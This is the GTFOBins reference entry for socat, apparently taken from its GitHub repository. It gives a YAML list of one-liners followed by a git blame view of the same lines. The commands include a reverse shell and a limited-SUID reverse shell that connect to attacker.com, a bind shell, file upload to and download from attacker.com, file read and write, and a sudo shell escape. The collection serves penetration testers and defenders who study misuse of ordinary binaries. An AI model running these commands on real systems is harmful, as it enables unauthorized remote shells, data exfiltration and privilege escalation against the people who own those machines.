GTFOBins.github.io/_gtfobins/socat.md

---
functions:
  shell:
    - description: The resulting shell is not a proper TTY shell and lacks the prompt.
      code: |
        socat stdin exec:/bin/sh
  reverse-shell:
    - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
      code: |
        RHOST=attacker.com
        RPORT=12345
        socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
  bind-shell:
    - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
      code: |
        LPORT=12345
        socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
  file-upload:
    - description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_send
        socat -u file:$LFILE tcp-connect:$RHOST:$RPORT
  file-download:
    - description: Run ``socat -u file:file_to_send tcp-listen:12345,reuseaddr`` on the attacker box to send the file.
      code: |
        RHOST=attacker.com
        RPORT=12345
        LFILE=file_to_save
        socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
  file-read:
    - code: |
        LFILE=file_to_read
        socat -u "file:$LFILE" -
  file-write:
    - code: |
        LFILE=file_to_write
        socat -u 'exec:echo DATA' "open:$LFILE,creat"
  sudo:
    - description: The resulting shell is not a proper TTY shell and lacks the prompt.
      code: |
        sudo socat stdin exec:/bin/sh
  limited-suid:
    - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
      code: |
        RHOST=attacker.com
        RPORT=12345
        ./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
---
Add socat 2018-05-22 22:40:27 +02:00			`---`
			`functions:`
Add socat shell 2020-05-13 19:33:13 +02:00			`shell:`
Add note about socat shell 2020-05-13 19:41:28 +02:00			`- description: The resulting shell is not a proper TTY shell and lacks the prompt.`
			`code: \|`
Improve socat 2020-05-13 19:36:45 +02:00			`socat stdin exec:/bin/sh`
Adopt new function names 2018-10-05 19:55:38 +02:00			`reverse-shell:`
Use double backtick for inline code 2018-07-22 16:22:03 +02:00			- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
Improve socat 2020-05-13 19:36:45 +02:00			`socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane`
Adopt new function names 2018-10-05 19:55:38 +02:00			`bind-shell:`
Use double backtick for inline code 2018-07-22 16:22:03 +02:00			- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`code: \|`
			`LPORT=12345`
Improve socat 2020-05-13 19:36:45 +02:00			`socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane`
Fix socat so that the victim always connects to the attacker 2020-04-25 19:26:29 +02:00			`file-upload:`
			- description: Run ``socat -u tcp-listen:12345,reuseaddr open:file_to_save,creat`` on the attacker box to collect the file.
Update socat.md 2019-07-08 18:26:18 +02:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
Fix socat so that the victim always connects to the attacker 2020-04-25 19:26:29 +02:00			`LFILE=file_to_send`
Fix socat invocation 2020-04-25 19:36:06 +02:00			`socat -u file:$LFILE tcp-connect:$RHOST:$RPORT`
Fix socat so that the victim always connects to the attacker 2020-04-25 19:26:29 +02:00			`file-download:`
			- description: Run ``socat -u file:file_to_send tcp-listen:12345,reuseaddr`` on the attacker box to send the file.
Update socat.md 2019-07-08 18:26:18 +02:00			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
Fix socat so that the victim always connects to the attacker 2020-04-25 19:26:29 +02:00			`LFILE=file_to_save`
Fix socat invocation 2020-04-25 19:36:06 +02:00			`socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat`
Add socat file-read/write Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2021-10-27 08:43:44 +02:00			`file-read:`
			`- code: \|`
			`LFILE=file_to_read`
			`socat -u "file:$LFILE" -`
			`file-write:`
			`- code: \|`
			`LFILE=file_to_write`
			`socat -u 'exec:echo DATA' "open:$LFILE,creat"`
Improve socat 2020-05-13 19:36:45 +02:00			`sudo:`
Add note about socat shell 2020-05-13 19:41:28 +02:00			`- description: The resulting shell is not a proper TTY shell and lacks the prompt.`
			`code: \|`
Improve socat 2020-05-13 19:36:45 +02:00			`sudo socat stdin exec:/bin/sh`
			`limited-suid:`
			- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
			`code: \|`
			`RHOST=attacker.com`
			`RPORT=12345`
			`./socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`